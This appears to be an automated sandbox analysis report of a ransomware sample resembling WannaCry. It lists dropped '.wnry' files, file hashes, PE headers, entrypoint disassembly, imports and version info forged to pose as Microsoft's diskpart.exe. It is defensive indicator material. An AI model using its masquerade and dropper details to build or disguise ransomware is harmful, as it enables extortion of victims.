  • SHA: E354D1CC43D6A39D9732ADEA5D3B0F57284255D2
  • SHA-256: 1ADFEE058B98206CB4FBE1A46D3ED62A11E1DEE2C7FF521C1EEF7C706E6A700E
  • SHA-512: 908149A6F5238FCCCD86F7C374986D486590A0991EF5243F0CD9E63CC8E208158A9A812665233B09C3A478233D30F21E3D355B94F36B83644795556F147345BF
false
C:\msg\m_french.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 4E57113A6BF6B88FDD32782A4A381274
  • SHA: 0FCCBC91F0F94453D91670C6794F71348711061D
  • SHA-256: 9BD38110E6523547AED50617DDC77D0920D408FAEED2B7A21AB163FDA22177BC
  • SHA-512: 4F1918A12269C654D44E9D394BC209EF0BC32242BE8833A2FBA437B879125177E149F56F2FB0C302330DEC328139B34982C04B3FEFB045612B6CC9F83EC85AA9
false
C:\msg\m_german.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 3D59BBB5553FE03A89F817819540F469
  • SHA: 26781D4B06FF704800B463D0F1FCA3AFD923A9FE
  • SHA-256: 2ADC900FAFA9938D85CE53CB793271F37AF40CF499BCC454F44975DB533F0B61
  • SHA-512: 95719AE80589F71209BB3CB953276538040E7111B994D757B0A24283AEFE27AADBBE9EEF3F1F823CE4CABC1090946D4A2A558607AC6CAC6FACA5971529B34DAC
false
C:\msg\m_greek.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: FB4E8718FEA95BB7479727FDE80CB424
  • SHA: 1088C7653CBA385FE994E9AE34A6595898F20AEB
  • SHA-256: E13CC9B13AA5074DC45D50379ECEB17EE39A0C2531AB617D93800FE236758CA9
  • SHA-512: 24DB377AF1569E4E2B2EBCCEC42564CEA95A30F1FF43BCAF25A692F99567E027BCEF4AACEF008EC5F64EA2EEF0C04BE88D2B30BCADABB3919B5F45A6633940CB
false
C:\msg\m_indonesian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 3788F91C694DFC48E12417CE93356B0F
  • SHA: EB3B87F7F654B604DAF3484DA9E02CA6C4EA98B7
  • SHA-256: 23E5E738AAD10FB8EF89AA0285269AFF728070080158FD3E7792FE9ED47C51F4
  • SHA-512: B7DD9E6DC7C2D023FF958CAF132F0544C76FAE3B2D8E49753257676CC541735807B4BEFDF483BCAE94C2DCDE3C878C783B4A89DCA0FECBC78F5BBF7C356F35CD
false
C:\msg\m_italian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 30A200F78498990095B36F574B6E8690
  • SHA: C4B1B3C087BD12B063E98BCA464CD05F3F7B7882
  • SHA-256: 49F2C739E7D9745C0834DC817A71BF6676CCC24A4C28DCDDF8844093AAB3DF07
  • SHA-512: C0DA2AAE82C397F6943A0A7B838F60EEEF8F57192C5F498F2ECF05DB824CFEB6D6CA830BF3715DA7EE400AA8362BD64DC835298F3F0085AE7A744E6E6C690511
false
C:\msg\m_japanese.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: B77E1221F7ECD0B5D696CB66CDA1609E
  • SHA: 51EB7A254A33D05EDF188DED653005DC82DE8A46
  • SHA-256: 7E491E7B48D6E34F916624C1CDA9F024E86FCBEC56ACDA35E27FA99D530D017E
  • SHA-512: F435FD67954787E6B87460DB026759410FBD25B2F6EA758118749C113A50192446861A114358443A129BE817020B50F21D27B1EBD3D22C7BE62082E8B45223FC
false
C:\msg\m_korean.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 6735CB43FE44832B061EEB3F5956B099
  • SHA: D636DAF64D524F81367EA92FDAFA3726C909BEE1
  • SHA-256: 552AA0F82F37C9601114974228D4FC54F7434FE3AE7A276EF1AE98A0F608F1D0
  • SHA-512: 60272801909DBBA21578B22C49F6B0BA8CD0070F116476FF35B3AC8347B987790E4CC0334724244C4B13415A246E77A577230029E4561AE6F04A598C3F536C7E
false
C:\msg\m_latvian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: C33AFB4ECC04EE1BCC6975BEA49ABE40
  • SHA: FBEA4F170507CDE02B839527EF50B7EC74B4821F
  • SHA-256: A0356696877F2D94D645AE2DF6CE6B370BD5C0D6DB3D36DEF44E714525DE0536
  • SHA-512: 0D435F0836F61A5FF55B78C02FA47B191E5807A79D8A6E991F3115743DF2141B3DB42BA8BDAD9AD259E12F5800828E9E72D7C94A6A5259312A447D669B03EC44
false
C:\msg\m_norwegian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: FF70CC7C00951084175D12128CE02399
  • SHA: 75AD3B1AD4FB14813882D88E952208C648F1FD18
  • SHA-256: CB5DA96B3DFCF4394713623DBF3831B2A0B8BE63987F563E1C32EDEB74CB6C3A
  • SHA-512: F01DF3256D49325E5EC49FD265AA3F176020C8FFEC60EB1D828C75A3FA18FF8634E1DE824D77DFDD833768ACFF1F547303104620C70066A2708654A07EF22E19
false
C:\msg\m_polish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: E79D7F2833A9C2E2553C7FE04A1B63F4
  • SHA: 3D9F56D2381B8FE16042AA7C4FEB1B33F2BAEBFF
  • SHA-256: 519AD66009A6C127400C6C09E079903223BD82ECC18AD71B8E5CD79F5F9C053E
  • SHA-512: E0159C753491CAC7606A7250F332E87BC6B14876BC7A1CF5625FA56AB4F09C485F7B231DD52E4FF0F5F3C29862AFB1124C0EFD0741613EB97A83CBE2668AF5DE
false
C:\msg\m_portuguese.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: FA948F7D8DFB21CEDDD6794F2D56B44F
  • SHA: CA915FBE020CAA88DD776D89632D7866F660FC7A
  • SHA-256: BD9F4B3AEDF4F81F37EC0A028AABCB0E9A900E6B4DE04E9271C8DB81432E2A66
  • SHA-512: 0D211BFB0AE953081DCA00CD07F8C908C174FD6C47A8001FADC614203F0E55D9FBB7FA9B87C735D57101341AB36AF443918EE00737ED4C19ACE0A2B85497F41A
false
C:\msg\m_romanian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 313E0ECECD24F4FA1504118A11BC7986
  • SHA: E1B9AE804C7FB1D27F39DB18DC0647BB04E75E9D
  • SHA-256: 70C0F32ED379AE899E5AC975E20BBBACD295CF7CD50C36174D2602420C770AC1
  • SHA-512: C7500363C61BAF8B77FCE796D750F8F5E6886FF0A10F81C3240EA3AD4E5F101B597490DEA8AB6BD9193457D35D8FD579FCE1B88A1C8D85EBE96C66D909630730
false
C:\msg\m_russian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 452615DB2336D60AF7E2057481E4CAB5
  • SHA: 442E31F6556B3D7DE6EB85FBAC3D2957B7F5EAC6
  • SHA-256: 02932052FAFE97E6ACAAF9F391738A3A826F5434B1A013ABBFA7A6C1ADE1E078
  • SHA-512: 7613DC329ABE7A3F32164C9A6B660F209A84B774AB9C008BF6503C76255B30EA9A743A6DC49A8DE8DF0BCB9AEA5A33F7408BA27848D9562583FF51991910911F
false
C:\msg\m_slovak.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: C911ABA4AB1DA6C28CF86338AB2AB6CC
  • SHA: FEE0FD58B8EFE76077620D8ABC7500DBFEF7C5B0
  • SHA-256: E64178E339C8E10EAC17A236A67B892D0447EB67B1DCD149763DAD6FD9F72729
  • SHA-512: 3491ED285A091A123A1A6D61AAFBB8D5621CCC9E045A237A2F9C2CF6049E7420EB96EF30FDCEA856B50454436E2EC468770F8D585752D73FAFD676C4EF5E800A
false
C:\msg\m_spanish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 8D61648D34CBA8AE9D1E2A219019ADD1
  • SHA: 2091E42FC17A0CC2F235650F7AAD87ABF8BA22C2
  • SHA-256: 72F20024B2F69B45A1391F0A6474E9F6349625CE329F5444AEC7401FE31F8DE1
  • SHA-512: 68489C33BA89EDFE2E3AEBAACF8EF848D2EA88DCBEF9609C258662605E02D12CFA4FFDC1D266FC5878488E296D2848B2CB0BBD45F1E86EF959BAB6162D284079
false
C:\msg\m_swedish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: C7A19984EB9F37198652EAF2FD1EE25C
  • SHA: 06EAFED025CF8C4D76966BF382AB0C5E1BD6A0AE
  • SHA-256: 146F61DB72297C9C0FACFFD560487F8D6A2846ECEC92ECC7DB19C8D618DBC3A4
  • SHA-512: 43DD159F9C2EAC147CBFF1DDA83F6A83DD0C59D2D7ACAC35BA8B407A04EC9A1110A6A8737535D060D100EDE1CB75078CF742C383948C9D4037EF459D150F6020
false
C:\msg\m_turkish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 531BA6B1A5460FC9446946F91CC8C94B
  • SHA: CC56978681BD546FD82D87926B5D9905C92A5803
  • SHA-256: 6DB650836D64350BBDE2AB324407B8E474FC041098C41ECAC6FD77D632A36415
  • SHA-512: EF25C3CF4343DF85954114F59933C7CC8107266C8BCAC3B5EA7718EB74DBEE8CA8A02DA39057E6EF26B64F1DFCCD720DD3BF473F5AE340BA56941E87D6B796C9
false
C:\msg\m_vietnamese.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 8419BE28A0DCEC3F55823620922B00FA
  • SHA: 2E4791F9CDFCA8ABF345D606F313D22B36C46B92
  • SHA-256: 1F21838B244C80F8BED6F6977AA8A557B419CF22BA35B1FD4BF0F98989C5BDF8
  • SHA-512: 8FCA77E54480AEA3C0C7A705263ED8FB83C58974F5F0F62F12CC97C8E0506BA2CDB59B70E59E9A6C44DD7CDE6ADEEEC35B494D31A6A146FF5BA7006136AB9386
false
C:\r.wnry
  • Type: ASCII text, with CRLF line terminators
  • MD5: 3E0020FC529B1C2A061016DD2469BA96
  • SHA: C3A91C22B63F6FE709E7C29CAFB29A2EE83E6ADE
  • SHA-256: 402751FA49E0CB68FE052CB3DB87B05E71C1D950984D339940CF6B29409F2A7C
  • SHA-512: 5CA3C134201ED39D96D72911C0498BAE6F98701513FD7F1DC8512819B673F0EA580510FA94ED9413CCC73DA18B39903772A7CBFA3478176181CEE68C896E14CF
false
C:\s.wnry
  • Type: Zip archive data, at least v1.0 to extract
  • MD5: AD4C9DE7C8C40813F200BA1C2FA33083
  • SHA: D1AF27518D455D432B62D73C6A1497D032F6120E
  • SHA-256: E18FDD912DFE5B45776E68D578C3AF3547886CF1353D7086C8BEE037436DFF4B
  • SHA-512: 115733D08E5F1A514808A20B070DB7FF453FD149865F49C04365A8C6502FA1E5C3A31DA3E21F688AB040F583CF1224A544AEA9708FFAB21405DDE1C57F98E617
false
C:\t.wnry
  • Type: data
  • MD5: 5DCAAC857E695A65F5C3EF1441A73A8F
  • SHA: 7B10AAEEE05E7A1EFB43D9F837E9356AD55C07DD
  • SHA-256: 97EBCE49B14C46BEBC9EC2448D00E1E397123B256E2BE9EBA5140688E7BC0AE6
  • SHA-512: 06EB5E49D19B71A99770D1B11A5BB64A54BF3352F36E39A153469E54205075C203B08128DC2317259DB206AB5323BDD93AAA252A066F57FB5C52FF28DEEDB5E2
false
C:\taskdl.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • MD5: 4FEF5E34143E646DBF9907C4374276F5
  • SHA: 47A9AD4125B6BD7C55E4E7DA251E23F089407B8F
  • SHA-256: 4A468603FDCB7A2EB5770705898CF9EF37AADE532A7964642ECD705A74794B79
  • SHA-512: 4550DD1787DEB353EBD28363DD2CDCCCA861F6A5D9358120FA6AA23BAA478B2A9EB43CEF5E3F6426F708A0753491710AC05483FAC4A046C26BEC4234122434D5
false
C:\taskse.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • MD5: 8495400F199AC77853C53B5A3F278F3E
  • SHA: BE5D6279874DA315E3080B06083757AAD9B32C23
  • SHA-256: 2CA2D550E603D74DEDDA03156023135B38DA3630CB014E3D00B1263358C5F00D
  • SHA-512: 0669C524A295A049FA4629B26F89788B2A74E1840BCDC50E093A0BD40830DD1279C9597937301C0072DB6ECE70ADEE4ACE67C3C8A4FB2DB6DEAFD8F1E887ABE4
false
C:\u.wnry
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • MD5: 7BF2B57F2A205768755C07F238FB32CC
  • SHA: 45356A9DD616ED7161A3B9192E2F318D0AB5AD10
  • SHA-256: B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
  • SHA-512: 91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
true

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:1.exe
File size:3514368
MD5:84c82835a5d21bbcf75a61706d8ab549
SHA1:5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256:ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512:90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:...T...T...T...X...T..._...T.'.Z...T...^...T...P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L..

File Icon

Static PE Info

General

Entrypoint:0x4077ba
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x4CE78F41 [Sat Nov 20 09:05:05 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:68f013d7437aa653a8a98a05807afeb1

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0040D488h
push 004076F4h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [004081C4h]
pop ecx
or dword ptr [0040F94Ch], FFFFFFFFh
or dword ptr [0040F950h], FFFFFFFFh
call dword ptr [004081C0h]
mov ecx, dword ptr [0040F948h]
mov dword ptr [eax], ecx
call dword ptr [004081BCh]
mov ecx, dword ptr [0040F944h]
mov dword ptr [eax], ecx
mov eax, dword ptr [004081B8h]
mov eax, dword ptr [eax]
mov dword ptr [0040F954h], eax
call 00007F3701051D0Bh
cmp dword ptr [0040F870h], ebx
jne 00007F3701051BFEh
push 0040793Ch
call dword ptr [004081B4h]
pop ecx
call 00007F3701051CDDh
push 0040E00Ch
push 0040E008h
call 00007F3701051CC8h
mov eax, dword ptr [0040F940h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [0040F93Ch]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [004081ACh]
push 0040E004h

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0xd5a80x64.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x349fa0.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x80000x1d8.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeEntropyXored PEZLIB ComplexityFile TypeCharacteristics
.text0x10000x69b00x7000False0.574741908482data6.4042351061IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0x80000x5f700x6000False0.578165690104data6.66357096841IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0xe0000x19580x2000False0.394287109375data4.45574950787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc0x100000x349fa00x34a000IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ0x10000

Resources

NameRVASizeTypeLanguageCountry
XIA0x100f00x349635Zip archive data, at least v2.0 to extractEnglishUnited States
RT_VERSION0x3597280x388dataEnglishUnited States
RT_MANIFEST0x359ab00x4efexported SGML document, ASCII text, with CRLF line terminatorsEnglishUnited States

Imports

DLLImport
KERNEL32.dllGetFileAttributesW, GetFileSizeEx, CreateFileA, InitializeCriticalSection, DeleteCriticalSection, ReadFile, GetFileSize, WriteFile, LeaveCriticalSection, EnterCriticalSection, SetFileAttributesW, SetCurrentDirectoryW, CreateDirectoryW, GetTempPathW, GetWindowsDirectoryW, GetFileAttributesA, SizeofResource, LockResource, LoadResource, MultiByteToWideChar, Sleep, OpenMutexA, GetFullPathNameA, CopyFileA, GetModuleFileNameA, VirtualAlloc, VirtualFree, FreeLibrary, HeapAlloc, GetProcessHeap, GetModuleHandleA, SetLastError, VirtualProtect, IsBadReadPtr, HeapFree, SystemTimeToFileTime, LocalFileTimeToFileTime, CreateDirectoryA, GetStartupInfoA, SetFilePointer, SetFileTime, GetComputerNameW, GetCurrentDirectoryA, SetCurrentDirectoryA, GlobalAlloc, LoadLibraryA, GetProcAddress, GlobalFree, CreateProcessA, CloseHandle, WaitForSingleObject, TerminateProcess, GetExitCodeProcess, FindResourceA
USER32.dllwsprintfA
ADVAPI32.dllCreateServiceA, OpenServiceA, StartServiceA, CloseServiceHandle, CryptReleaseContext, RegCreateKeyW, RegSetValueExA, RegQueryValueExA, RegCloseKey, OpenSCManagerA
MSVCRT.dllrealloc, fclose, fwrite, fread, fopen, sprintf, rand, srand, strcpy, memset, strlen, wcscat, wcslen, __CxxFrameHandler, ??3@YAXPAX@Z, memcmp, _except_handler3, _local_unwind2, wcsrchr, swprintf, ??2@YAPAXI@Z, memcpy, strcmp, strrchr, __p___argv, __p___argc, _stricmp, free, malloc, ??0exception@@QAE@ABV0@@Z, ??1exception@@UAE@XZ, ??0exception@@QAE@ABQBD@Z, _CxxThrowException, calloc, strcat, _mbsstr, ??1type_info@@UAE@XZ, _exit, _XcptFilter, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _controlfp

Version Infos

DescriptionData
LegalCopyright Microsoft Corporation. All rights reserved.
InternalNamediskpart.exe
FileVersion6.1.7601.17514 (win7sp1_rtm.101119-1850)
CompanyNameMicrosoft Corporation
ProductNameMicrosoft Windows Operating System
ProductVersion6.1.7601.17514
FileDescriptionDiskPart
OriginalFilenamediskpart.exe
Translation0x0409 0x04b0

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States